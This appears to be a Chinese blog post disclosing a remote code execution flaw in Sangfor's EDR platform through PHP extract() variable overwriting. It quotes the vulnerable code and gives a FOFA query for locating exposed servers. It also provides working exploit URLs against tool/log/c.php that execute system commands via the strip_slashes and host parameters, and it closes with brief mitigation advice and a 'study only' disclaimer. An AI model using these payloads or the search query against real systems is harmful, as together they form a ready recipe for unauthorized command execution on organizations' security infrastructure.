深信服 EDR终端检测响应平台-RCE-0day漏洞

注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!


0x01 介绍

深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。
  

0x02 RCE

1、本标题译为远程代码执行(remote command/code execute)

2、让我们来了解一下php变量覆盖漏洞函数吧

  extract($params):写入全局变量!!!

  ① 这里举个栗子~
在这里插入图片描述

  ② 通过extract函数在Get传参,覆盖变量$auth和$a的值得到结果private!
在这里插入图片描述

3、我们来看一下HW队挖来的代码

echo "<p><b>Log Helper</b></p>";
$show_form($_REQUEST); 

跟入show_form

 /**      * 显示表单      * @param array $params 请求参数      * @return      */
$show_form = function($params) use(&$strip_slashes, &$show_input) {
         extract($params);
         $host  = isset($host)  ? $strip_slashes($host)  : "127.0.0.1";
$main = function($argv) {
         extract($argv);
         if (!isset($code)){
         return;
         }
         eval($code);
    }; 

一看就是经典的php变量覆盖漏洞,还完成了RCE,简直是官方后门,一句话后门都不敢这么写。


HW队拓展一下,使用grep搜索一下,发现tools目录下全部都是变量覆盖漏洞……
在这里插入图片描述

0x02 fofa:

title=“SANGFOR终端检测响应平台”
在这里插入图片描述

0x03 payload:

经过上面代码分析漏洞位置:host 参数


例一、

https://IP/tool/log/c.php?strip_slashes=system&host=id

在这里插入图片描述


例二、

https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=pwd

在这里插入图片描述

0x04 建议:

1、其实别的页面也有很多类似的漏洞,比如登陆页面可以利用其实现任意用户免密登录(我的另一篇博客有写到)
  代码漏洞太多了,所以还是建议先下线吧,临时处置可采取;

2、实在不想下线的紧急处理:
  ①将该目录先删除或藏到很深很深深到FBI找不到;
  ②将登陆界面代码部分重写;

注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

土豆.exe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值